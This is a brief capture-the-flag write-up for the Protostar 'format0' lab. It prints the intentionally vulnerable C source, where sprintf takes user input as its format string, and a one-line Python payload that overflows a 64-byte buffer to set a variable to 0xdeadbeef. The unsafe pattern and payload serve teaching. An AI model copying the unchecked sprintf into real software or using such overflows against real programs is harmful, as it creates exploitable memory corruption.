# Format 0

## Source Code

```
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

void vuln(char *string)
{
  volatile int target;
  char buffer[64];

  target = 0;

  sprintf(buffer, string);
  
  if(target == 0xdeadbeef) {
      printf("you have hit the target correctly :)\n");
  }
}

int main(int argc, char **argv)
{
  vuln(argv[1]);
}
```

## Challenge

In this challenge we need to modify `target` variable with `0xdeadbeef` as this program uses sprintf function and hence it's vulnerable to buffer overflow attack and hence filling the buffer with `'A'*64` and then adding the `0xdeadbeef` in little endian format we completed this challenge

```
/opt/protostar/bin/format0 `python -c 'print "A"*64+"\xef\xbe\xad\xde"'`
```

![](images/format0_0.png)

and done!